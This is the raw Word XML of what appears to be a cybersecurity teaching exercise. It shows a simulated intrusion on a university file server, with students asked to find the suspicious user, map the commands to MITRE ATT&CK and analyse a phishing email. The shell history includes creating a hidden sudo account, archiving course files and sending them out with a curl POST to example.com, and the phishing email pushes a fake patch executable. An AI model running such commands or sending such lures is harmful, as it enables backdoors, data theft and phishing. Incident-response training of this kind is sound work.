                                <w:p w14:paraId="3DD7A2B5" w14:textId="2DDFC29C" w:rsidR="007E1E6A" w:rsidRDefault="007E1E6A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User: Dr</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00135C32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Yi</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4AFD2C36" w14:textId="1149E613" w:rsidR="00135C32" w:rsidRDefault="00135C32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nano /teaching/COS30015/2025/</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00667CD1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Students/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student_list.txt</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="74623C6C" w14:textId="77777777" w:rsidR="00FB722E" w:rsidRDefault="00FB722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</w:p>
                                <w:p w14:paraId="71BD906F" w14:textId="7A3C641A" w:rsidR="00FB722E" w:rsidRDefault="00FB722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User: </w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B771DD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Admin</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="73A0BC16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whoami</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="785C9259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id</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1267520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env</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="20C1929C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echo $SHELL</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3D221E86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uname -a</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="60F9C8D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lsb_release -a</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="699A5829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lscpu</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6135135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free -h</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4C346A91" w14:textId="77777777" w:rsid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lsblk</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="49F74DF8" w14:textId="790C68F1" w:rsidR="00E95A6E" w:rsidRPr="00904C2C" w:rsidRDefault="00E95A6E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ls -l /teaching/COS30015/2025/</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="11E914B8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cat /etc/passwd</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="35CC9AB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cat /etc/group</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0558C12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getent passwd | grep -E '(^root|sudo)'</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="38F6475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groups</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5B1A9B9B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sudo useradd -m -s /bin/bash Administrat0r </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="26D07774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 passwd Administrat0r</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2683776E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 usermod -aG sudo Administrat0r</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1C898C15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sudo usermod -aG topsecret Administrat0r</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="63CFC24A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ping -c 4 8.8.8.8</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="345D87B8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nslookup example.com</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="032C7AD5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netstat -tuln</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5C7100D0" w14:textId="77777777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curl -I http://example.com</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="763917AF" w14:textId="6AB45EDD" w:rsidR="00904C2C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tar -czf /tmp/documents_backup.tar.gz </w:t>
                                  </w:r>
                                  <w:r w:rsidR="0006300A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/teaching/COS30015/</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00E95A6E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2025/</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="68BF586C" w14:textId="3D80BDB4" w:rsidR="00E027DD" w:rsidRPr="00904C2C" w:rsidRDefault="00904C2C" w:rsidP="00904C2C">
                                  <w:pPr>
                                    <w:spacing w:after="80" w:line="240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904C2C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curl -X POST -F "file=@/tmp/documents_backup.tar.gz" http://example.com/upload</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx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91AEB" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:2.75pt;margin-top:3.55pt;width:414.7pt;height:56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" fillcolor="#fae2d5 [661]" strokecolor="#030e13 [484]" strokeweight="1pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="75F46028" w14:textId="569C5E25" w:rsidR="00E027DD" w:rsidRDefault="00064F3F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User: </w:t>
                            </w:r>
                            <w:r w:rsidR="004A0D88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TA</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="43B02FA2" w14:textId="7154F91C" w:rsidR="004A0D88" w:rsidRDefault="003209E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</w:t>
                            </w:r>
                            <w:r w:rsidR="004A0D88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ano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/teaching/COS30015/2025/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Assignments/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A1_Marks.txt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="579671D9" w14:textId="71BB9CFE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nano /teaching/COS30015/2025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/Assignments/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A1_Marks.txt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FB73957" w14:textId="77777777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</w:p>
                          <w:p w14:paraId="3DD7A2B5" w14:textId="2DDFC29C" w:rsidR="007E1E6A" w:rsidRDefault="007E1E6A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User: Dr</w:t>
                            </w:r>
                            <w:r w:rsidR="00135C32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Yi</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4AFD2C36" w14:textId="1149E613" w:rsidR="00135C32" w:rsidRDefault="00135C32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nano /teaching/COS30015/2025/</w:t>
                            </w:r>
                            <w:r w:rsidR="00667CD1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Students/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student_list.txt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="74623C6C" w14:textId="77777777" w:rsidR="00FB722E" w:rsidRDefault="00FB722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</w:p>
                          <w:p w14:paraId="71BD906F" w14:textId="7A3C641A" w:rsidR="00FB722E" w:rsidRDefault="00FB722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User: </w:t>
                            </w:r>
                            <w:r w:rsidR="00B771DD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Admin</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="73A0BC16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whoami</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="785C9259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id</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1267520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env</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="20C1929C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echo $SHELL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D221E86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uname -a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60F9C8D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lsb_release -a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="699A5829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lscpu</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6135135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free -h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C346A91" w14:textId="77777777" w:rsid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lsblk</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="49F74DF8" w14:textId="790C68F1" w:rsidR="00E95A6E" w:rsidRPr="00904C2C" w:rsidRDefault="00E95A6E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ls -l /teaching/COS30015/2025/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11E914B8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cat /etc/passwd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35CC9AB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cat /etc/group</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0558C12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getent passwd | grep -E '(^root|sudo)'</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38F6475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groups</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B1A9B9B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sudo useradd -m -s /bin/bash Administrat0r </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="26D07774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 passwd Administrat0r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2683776E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 usermod -aG sudo Administrat0r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C898C15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sudo usermod -aG topsecret Administrat0r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="63CFC24A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ping -c 4 8.8.8.8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="345D87B8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nslookup example.com</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="032C7AD5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netstat -tuln</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C7100D0" w14:textId="77777777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curl -I http://example.com</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="763917AF" w14:textId="6AB45EDD" w:rsidR="00904C2C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tar -czf /tmp/documents_backup.tar.gz </w:t>
                            </w:r>
                            <w:r w:rsidR="0006300A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/teaching/COS30015/</w:t>
                            </w:r>
                            <w:r w:rsidR="00E95A6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2025/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="68BF586C" w14:textId="3D80BDB4" w:rsidR="00E027DD" w:rsidRPr="00904C2C" w:rsidRDefault="00904C2C" w:rsidP="00904C2C">
                            <w:pPr>
                              <w:spacing w:after="80" w:line="240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904C2C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curl -X POST -F "file=@/tmp/documents_backup.tar.gz" http://example.com/upload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645C50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9363650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FCE7F5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0FF7219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6D1600D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95E884B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A9FA094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8E0270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A453803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C82C57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FDD980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31D464A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051E5C41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8C5D52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88EDABC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B6A468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7204F8F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6D98E282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1D3692F5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1B0930D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E062F96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4E5C93D7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50A06CC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57B028A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4B1D2A98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38F7E77B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  <w:p w14:paraId="7F0D2FD6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36D0245B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73812A5A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4288C769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472102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5BF8B86E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DDF7FA6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1DE49E07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5FF2517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6BC183C1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65030EA0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757D4DE9" w14:textId="77777777" w:rsidR="00E95A6E" w:rsidRDefault="00E95A6E" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E02B05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40AC896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22F067B0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0E13DED3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705309C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61A71B65" w14:textId="77777777" w:rsidR="00144BDD" w:rsidRDefault="00144BDD" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1978207E" w14:textId="77777777" w:rsidR="00E027DD" w:rsidRDefault="00E027DD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E027DD" w14:paraId="48252F01" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="385BDEDB" w14:textId="034A29D4" w:rsidR="00E027DD" w:rsidRPr="00465A86" w:rsidRDefault="00B32240" w:rsidP="0053454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Which user has suspicious commands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  <w:p w14:paraId="378159B7" w14:textId="0E58B2A2" w:rsidR="00E027DD" w:rsidRPr="00465A86" w:rsidRDefault="00643FFA" w:rsidP="0053454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Is it bad the adversary has access to that account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  <w:p w14:paraId="7640AE25" w14:textId="53AD1073" w:rsidR="00FC4F94" w:rsidRPr="00465A86" w:rsidRDefault="00FC4F94" w:rsidP="00DB230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vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>What are the MITRE ATT&amp;CK TTPs associated to these commands</w:t>
            </w:r>
            <w:r w:rsidR="00E027DD" w:rsidRPr="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159609FD" w14:textId="77777777" w:rsidR="00FC4F94" w:rsidRPr="00465A86" w:rsidRDefault="00FC4F94" w:rsidP="00FC4F94">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4074491A" w14:textId="315CE265" w:rsidR="00E027DD" w:rsidRPr="00C84765" w:rsidRDefault="00FC4F94" w:rsidP="00C8476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Did the adversary seek to create persistence</w:t>
            </w:r>
            <w:r w:rsidR="00E027DD" w:rsidRPr="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54242B80" w14:textId="1E97AC8F" w:rsidR="71180FE4" w:rsidRDefault="71180FE4" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557E5477" w14:textId="47A47325" w:rsidR="67E59C76" w:rsidRPr="00465A86" w:rsidRDefault="00A917D9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 xml:space="preserve">Server </w:t>
      </w:r>
      <w:r w:rsidR="004B1BAB" w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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1BAB" w14:paraId="0D22E467" w14:textId="77777777" w:rsidTr="0053454A">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="068DE8A6" w14:textId="7747733A" w:rsidR="004B1BAB" w:rsidRPr="00A917D9" w:rsidRDefault="00A917D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After identifying the commands on the </w:t>
            </w:r>
            <w:r w:rsidR="009B7A76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>teaching</w:t>
            </w:r>
            <w:r w:rsidR="001C5DD3">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> File Server,</w:t>
            </w:r>
            <w:r w:rsidR="009B7A76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> it has been confirmed the adversary exfiltrated data</w:t>
            </w:r>
            <w:r w:rsidR="00A07823">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. After inspecting the ____?___ logs it can be confirmed that a login occurred from </w:t>
            </w:r>
            <w:r w:rsidR="00F44299">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>192.138.100.10 host</w:t>
            </w:r>
            <w:r w:rsidR="000E1955">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE15BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Saturday 20 September 2025 at 11:01 am</w:t>
            </w:r>
            <w:r w:rsidR="000E1955">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B1BAB" w14:paraId="7777F469" w14:textId="77777777" w:rsidTr="0053454A">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA0EA75" w14:textId="4F33534D" w:rsidR="004B1BAB" w:rsidRDefault="009500DC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Complete the missing element (____?___) - </w:t>
            </w:r>
            <w:r w:rsidR="004B1BAB" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidR="000E1955">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>hat logs could be viewed in a Linux system to confirm authentication</w:t>
            </w:r>
            <w:r w:rsidR="004B1BAB" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF9B1EB" w14:textId="7F0F8E08" w:rsidR="00F44299" w:rsidRDefault="004B1BAB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67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>What</w:t>
            </w:r>
            <w:r w:rsidR="00F44299">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the 192.168.100.10 host?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36AD576B" w14:textId="12C8D0AE" w:rsidR="00F44299" w:rsidRDefault="00F44299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is this host located?</w:t>
            </w:r>
            <w:r w:rsidR="00CD4D79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A0651B" w14:textId="7172E6E4" w:rsidR="00211D60" w:rsidRDefault="00CD4D79" w:rsidP="004B1B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it secure to allow </w:t>
            </w:r>
            <w:r w:rsidR="00F44299">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">remote access </w:t>
            </w:r>
            <w:r w:rsidR="00211D60">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">to the servers </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>from the location above</w:t>
            </w:r>
            <w:r w:rsidR="00211D60">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311209BC" w14:textId="6010A4E0" w:rsidR="004B1BAB" w:rsidRDefault="00211D60" w:rsidP="009D767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might you improve</w:t>
            </w:r>
            <w:r w:rsidR="00CD4D79">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> security in this example?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AFCDD3" w14:textId="7991FC83" w:rsidR="001A449A" w:rsidRPr="009D767D" w:rsidRDefault="001A449A" w:rsidP="009D767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would we need to do to confirm when these commands were likely ran?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="730D3DE1" w14:textId="77777777" w:rsidR="004B1BAB" w:rsidRDefault="004B1BAB" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BCF9CB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66228C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5095FE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8822B4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77A026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3C486B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8FB5AD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E610D6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8DD701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F8974F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227083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5A6567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6DA0C5E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1A7D00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72145DF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58221C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2FA061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C085F0E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B1741A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CD07C5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BD3E171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42C846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65E852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B3B16A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232DF3F" w14:textId="5F8575CA" w:rsidR="008528FA" w:rsidRPr="00465A86" w:rsidRDefault="71180FE4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A suspicious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34B1" w14:paraId="056605EA" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767C2DC2" w14:textId="77482058" w:rsidR="002B34B1" w:rsidRDefault="002B34B1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Talking with the system administrator they recall an email they recently received. </w:t>
            </w:r>
            <w:r w:rsidR="00BB1FD5"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</w:rPr>
              <w:t xml:space="preserve"> contents of this </w:t>
            </w:r>
            <w:r w:rsidR="00124DE4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>email</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> are provided below for analysis.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14F461C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34B34B6" wp14:editId="172CCBA2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68580</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5074920" cy="6682740"/>
                      <wp:effectExtent l="0" t="0" r="11430" b="22860"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1571695282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2736EE2-5708-4F75-BCFA-A1F7F8DD98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4920" cy="6682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0E5D67" w14:textId="7D21A606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From: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&lt;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.com&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="672219AC" w14:textId="07CA6D7B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To: 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</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="223FD2D9" w14:textId="72FE44FF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Subject: </w:t>
                                  </w:r>
                                  <w:r w:rsidR="00913AA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CVE</w:t>
                                  </w:r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9199292-2025</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="05888FE0" w14:textId="6F71736C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Date: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  <w:r w:rsid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)</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="63042AF6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Message-ID: &lt;1234567890abcdef@fakeemail.com&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="31F10E1D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Reply-To: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phish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@fakeemail.com</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="07B733D9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X-Mailer: FakeMailer 1.0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1A4CBFFC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Received: from mail.fakeemail.com (mail.fakeemail.com [192.168.1.100])</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0D6DEA36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by smtp.example.com (Postfix) with ESMTP id 1234ABCD</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4CBECDEB" w14:textId="6512225D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for &lt;</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00CA0E31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@example.com&gt;;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(PDT)</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4EEE81F8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Received: from unknown (HELO client.fakeemail.com) ([183.81.169.238])</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2EFCD984" w14:textId="190DC591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by mail.fakeemail.com with SMTP; </w:t>
                                  </w:r>
                                  <w:r w:rsidR="000D65BE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Wed, 17 Sep 2025 15:15:09 -0700 (PDT</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="35316F4D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X-Spam-Status: No, score=-1.2 required=5.0 tests=ALL_TRUSTED</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4487A85A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autolearn=disabled version=3.4.0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="23525432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X-Received: by 2002:a1c:44a0:: with SMTP id z6mr12345678ybd.87.169.123.45</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2874D14A" w14:textId="6A46B29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for &lt;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  <w:r w:rsidR="00BE64F0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@</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00BE64F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example</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00BE64F0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.com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&gt;; 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Wed, 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17 Sep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2025 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15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</w:t>
                                  </w:r>
                                  <w:r w:rsidR="008E5163"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15</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="000D65B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:09 -0700 (PDT)</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="248DD688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Content-Type: text/html; charset=UTF-8</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="706BE04B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Content-Transfer-Encoding: 7bit</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7588829F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</w:p>
                                <w:p w14:paraId="110804D3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&lt;html&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7BADDE40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&lt;body&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="58344804" w14:textId="2E252563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&lt;h1&gt;</w:t>
                                  </w:r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Urgent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!&lt;/h1&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="68BBAA93" w14:textId="5B070C0A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&lt;p&gt;Dear</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00BF1E6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Admin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&lt;/p&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="46D93B75" w14:textId="718179D1" w:rsidR="002B34B1" w:rsidRPr="00AF37D2" w:rsidRDefault="002B34B1" w:rsidP="008528FA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</w:t>
                                  </w:r>
                                  <w:r w:rsidR="008528FA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Your ISS webserver is vulnerable with the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like most</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00BF1E6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worse vulnerability ever. Please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download the patch pull program below. Install the program with admin privilege and then download IIS patch. Install </w:t>
                                  </w:r>
                                  <w:r w:rsidR="004C79BB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the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D53D0C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patch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on your web server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:&lt;/p&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="16CAC56F" w14:textId="1AC858B1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&lt;p&gt;&lt;a href="https://example.com/staging/</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00AF37D2">
                                    <w:t xml:space="preserve"> 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patch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.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exe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"&gt;</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00746934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Patch Program</w:t>
                                  </w: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&lt;/a&gt;&lt;/p&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7C04FA34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&lt;p&gt;Best regards,&lt;br&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="65FF96A6" w14:textId="48676670" w:rsidR="002B34B1" w:rsidRPr="00AF37D2" w:rsidRDefault="00746934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Ubuntu Security</w:t>
                                  </w:r>
                                  <w:r w:rsidR="002B34B1"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&lt;/p&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="19433E97" w14:textId="77777777" w:rsidR="002B34B1" w:rsidRPr="00AF37D2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&lt;/body&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="43C4E9FE" w14:textId="77777777" w:rsidR="002B34B1" w:rsidRPr="000E3718" w:rsidRDefault="002B34B1" w:rsidP="002B34B1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AF37D2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&lt;/html&gt;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B34B6" id="_x0000_s1027" style="position:absolute;margin-left:21.35pt;margin-top:5.4pt;width:399.6pt;height:526.2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" fillcolor="#fae2d5 [661]" strokecolor="#030e13 [484]" strokeweight="1pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="690E5D67" w14:textId="7D21A606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From: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&lt;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.com&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="672219AC" w14:textId="07CA6D7B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To: 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</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="223FD2D9" w14:textId="72FE44FF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Subject: </w:t>
                            </w:r>
                            <w:r w:rsidR="00913AA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CVE</w:t>
                            </w:r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9199292-2025</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="05888FE0" w14:textId="6F71736C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Date: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  <w:r w:rsid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)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="63042AF6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Message-ID: &lt;1234567890abcdef@fakeemail.com&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="31F10E1D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Reply-To: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phish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@fakeemail.com</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="07B733D9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X-Mailer: FakeMailer 1.0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A4CBFFC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Received: from mail.fakeemail.com (mail.fakeemail.com [192.168.1.100])</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0D6DEA36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by smtp.example.com (Postfix) with ESMTP id 1234ABCD</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CBECDEB" w14:textId="6512225D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for &lt;</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00CA0E31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@example.com&gt;;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(PDT)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4EEE81F8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Received: from unknown (HELO client.fakeemail.com) ([183.81.169.238])</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2EFCD984" w14:textId="190DC591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by mail.fakeemail.com with SMTP; </w:t>
                            </w:r>
                            <w:r w:rsidR="000D65BE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Wed, 17 Sep 2025 15:15:09 -0700 (PDT</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35316F4D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X-Spam-Status: No, score=-1.2 required=5.0 tests=ALL_TRUSTED</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4487A85A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autolearn=disabled version=3.4.0</w:t>
                            </w:r>
                          </w:p>
